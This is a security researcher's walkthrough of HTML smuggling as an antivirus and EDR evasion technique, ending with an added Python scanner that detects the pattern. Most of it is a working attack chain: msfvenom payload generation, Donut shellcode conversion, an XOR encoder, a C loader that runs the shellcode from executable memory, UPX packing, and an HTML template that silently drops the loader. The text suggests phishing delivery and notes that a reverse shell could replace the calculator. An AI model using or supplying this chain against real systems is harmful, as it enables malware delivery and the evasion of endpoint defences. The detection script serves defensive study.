What is HTML Smuggling?
HTML Smuggling leverages the browser's built-in JavaScript capabilities to reconstruct a binary file client-side from data embedded in the page. Because no executable file crosses the network as such, it circumvents traditional network protections that inspect downloads.
This project demonstrates how to use HTML Smuggling as an evasion technique to bypass Antivirus (AV) and Endpoint Detection and Response (EDR) solutions. Originally presented at Leiria Tech Talks, this walkthrough covers payload generation, shellcode transformation, in-memory execution, and delivery via a web browser using HTML Smuggling techniques.
HTML Smuggling and EDR Bypass
Demo Goals
EDR evasion
In-memory execution of calc.exe
Delivery via malicious HTML
Step-by-Step Payload Construction
Generate Payload
msfvenom -p windows/exec CMD=calc.exe -f exe -o calc_payload.exe
Convert EXE to Shellcode using Donut
donut -i calc_payload.exe -f 1 -o donut_payload.bin -z 1 -e 3 -b 3
# XOR-encode the Donut output with a single-byte key; the loader reverses this at run time
with open("donut_payload.bin", "rb") as f:
    data = bytearray(f.read())

key = 0xAA
encoded = bytearray([b ^ key for b in data])

with open("shellcode_xored.bin", "wb") as f:
    f.write(encoded)

print(f"[+] Shellcode encoded with XOR (key = 0x{key:02X}) saved as shellcode_xored.bin")
Convert Shellcode to C Header
xxd -i shellcode_xored.bin > shellcode.h
#include <windows.h>
#include <stdio.h>
#include <string.h>    /* memcpy */
#include "shellcode.h" /* shellcode_xored_bin[] and shellcode_xored_bin_len, generated by xxd -i */

unsigned char key = 0xAA; /* must match the key used by the Python encoder */

int main() {
    /* Undo the XOR encoding in place */
    for (int i = 0; i < shellcode_xored_bin_len; i++)
        shellcode_xored_bin[i] ^= key;

    /* Allocate an RWX region and copy the decoded shellcode into it */
    LPVOID exec = VirtualAlloc(0, shellcode_xored_bin_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec) return -1;
    memcpy(exec, shellcode_xored_bin, shellcode_xored_bin_len);

    /* Transfer control to the shellcode */
    ((void(*)())exec)();
    return 0;
}
i686-w64-mingw32-gcc loader.c -o loader.exe -m32 -Os -s -fno-ident -Wno-write-strings
upx --ultra-brute loader.exe
Base64 Encode for HTML Embedding
base64 -w 0 loader.exe > loader
HTML Smuggling HTML Template
<script>
    // Decode the base64 string into raw bytes inside the browser
    function base64ToArrayBuffer(base64) {
        var binary_string = window.atob(base64);
        var len = binary_string.length;
        var bytes = new Uint8Array(len);
        for (var i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
        }
        return bytes.buffer;
    }

    var file = "YOUR_BASE64_HERE"; // Replace this with your base64-encoded loader

    // Wrap the bytes in a Blob and trigger a download through a generated link
    let blob = new Blob([base64ToArrayBuffer(file)]);
    let a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "loader.exe";
    a.click();
</script>
The magic!
This is where the magic happens. As soon as the victim accesses the malicious URL (which, as discussed earlier in the article, could be delivered through multiple vectors — for this example, we’ll assume it was via phishing for simplicity), the loader is downloaded to the victim’s machine.
Once executed, it injects the shellcode — which, in this demonstration, simply launches the Windows calculator, but could just as easily be a reverse shell. The attack successfully bypasses Windows Defender, demonstrating an effective evasion of the built-in protection.
Security Insights
Fully browser-based, bypassing traditional inspection layers.
Effective against modern EDR, ATP, firewalls, and proxies.
Best countered via behavioral and memory monitoring.
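Because the file only exists once the browser assembles it, a mail gateway or proxy can still inspect the HTML itself. The following Python scanner is an added example, not part of the original project: it flags the atob / Blob / createObjectURL / download pattern used in the template above, decodes any long base64 literal it finds, and reports the reconstructed file's size, SHA-256 and whether it carries a PE (MZ) header, so the payload can be hashed and scanned before the page ever reaches a browser. The indicator names, the 64-character threshold and the sample page are all constructed for this example.

```python
import base64
import hashlib
import re

# Indicators drawn from the smuggling template discussed on this page (names are constructed).
INDICATORS = {
    "atob": r"\batob\s*\(",
    "blob": r"new\s+Blob\s*\(",
    "object_url": r"createObjectURL\s*\(",
    "download_attr": r"\.download\s*=",
    "auto_click": r"\.click\s*\(\s*\)",
}
# A long base64 string literal (the embedded file); 64+ chars is a constructed threshold.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{64,}={0,2})["\']')


def extract_payloads(html: str):
    """Decode every long base64 literal and describe the bytes it yields."""
    found = []
    for m in B64_LITERAL.finditer(html):
        try:
            data = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            continue
        found.append({
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "is_pe": data[:2] == b"MZ",  # DOS/PE header of a Windows executable
        })
    return found


def scan_html(html: str) -> dict:
    """Score the page on smuggling indicators and extract embedded files."""
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, html)]
    payloads = extract_payloads(html)
    suspicious = len(hits) >= 3 or any(p["is_pe"] for p in payloads)
    return {"indicators": hits, "payloads": payloads, "suspicious": suspicious}


# Constructed sample: the page's template carrying a tiny fake "MZ" file instead of a real loader.
SAMPLE_HTML = (
    "<script>var binary_string = window.atob(base64);"
    "var file = \"" + base64.b64encode(b"MZ" + b"\x00" * 70).decode() + "\";"
    "let blob = new Blob([base64ToArrayBuffer(file)]);"
    "a.href = URL.createObjectURL(blob); a.download = \"loader.exe\"; a.click();</script>"
)

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
```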
Conclusion
HTML Smuggling remains a powerful tactic in red team operations. Understanding its mechanics is key to building robust defensive strategies.
Feel free to check out this and other projects on my GitHub:
https://github.com/nullbyter19/xor-donut
Milton Araújo
Security Researcher